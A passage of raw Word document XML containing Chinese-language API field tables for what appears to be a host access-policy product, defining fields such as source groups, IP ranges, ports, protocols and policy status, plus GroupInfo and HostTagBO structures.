          <w:p w14:paraId="265F3623" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2DACA985" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>访问者范围，1:业务组、标签，2:自定义主机，3：自定义ip</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="6953C4BE" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3B4CBF64" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>srcGroups</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0A573919" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>List</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4F36186C" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>访问主机业务组</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="090CCD4B" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4DAFA13D" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>srcTags</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="65C9706F" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>List</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7BEB32E7" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>访问主机标签</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="6D023577" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4B2C7602" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>srcIpRanges</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="03B81AAC" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>List</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="48E3FA32" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>访问者ip范围</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="3B0621DD" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="08CA0641" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>srcAgentSize</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="495E8E01" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>long</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4B7AA483" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>访问主机数量</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="13CDFE26" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="754DE0D1" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>srcAgentIds</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="47B6A158" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>List</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="44588AB4" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>访问自定义主机范围</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="0AC85DC8" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="609BBAB7" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>srcIpName</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5156E030" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0CE365E3" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>访问主机ip</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="632D9878" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="43C26A7E" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>ports</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="147C3D64" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>List</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7D4BE217" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>端口</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="51EFFC98" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="673F2735" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>protos</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7CD00081" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>List</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="52B0566A" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>协议</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="29759D4D" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7EBA361F" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>status</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="48BB3A79" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="51BF0D7F" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>策略状态,0：新建，1：待同步，2：已同步,3:删除</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="646C7F3D" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2020567C" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>updateTime</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="13A29FC7" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>Long</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="60D848C4" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>修改时间</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="55EDFF62" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="315A208D" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>optUsername</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="699F8F72" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="294EFA88" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>操作用户</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="7425D4F0" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="266B337C" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>remark</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="79A2F090" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7AF3C051" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>备注</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="6CE6C1E8" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6A670295" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>displayDstIp</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0CDAF0AA" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="464F57C4" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>目标IP搜索字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="32EF2154" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6BA9DAF6" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>displaySrcIp</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6E420EF8" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="774526D1" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>源IP搜索字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="057496C0" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1ADE61AB" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>displayPort</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6055A1E7" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="50311161" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>端口搜索字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="34E0DADE" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="64C7F56D" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>switchStatus</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="661F40D8" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="58078E09" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>开关状态，0：关闭，1：打开</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="312A2516" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="31394A32" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>operation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7DE027F1" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>boolean</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1B694935" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>是否有操作权限，true：有权限，false：无权限</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="38DD84A0" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>GroupInfo</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="0020" w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="0" w:noVBand="0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1279"/>
        <w:gridCol w:w="777"/>
        <w:gridCol w:w="3336"/>
      </w:tblGrid>
      <w:tr w:rsidR="00497C54" w14:paraId="275FB6E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535BA7B" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="193FB7AF" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3C76747D" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="43893782" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1DF981EF" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>groupId</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="07FA6D84" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>int</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2D482391" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>业务组id</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="298C88F2" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="02235B29" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>platform</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="216CDAB6" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>int</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="680F2F0A" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>操作系统，1：linux，2：windows</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="05FD3CB5" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0F6E7E7D" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>name</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1CF73B55" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="53ABEF04" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>业务组名称</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="11D72FB3" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5F0E8D78" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>description</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4C562AC1" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="20B3191D" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>描述</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="3C435B79" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="074DA86B" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>parentId</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4942C1CD" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>int</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2111A067" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>父节点id</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="7F18F271" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>HostTagBO</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="0020" w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="0" w:noVBand="0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1103"/>
        <w:gridCol w:w="777"/>
        <w:gridCol w:w="1004"/>
      </w:tblGrid>
      <w:tr w:rsidR="00497C54" w14:paraId="5AB6121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B19CFCF" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="284634A8" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="285EDFA2" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="485DF57D" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="15E08D5E" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>id</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="629C0B8A" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
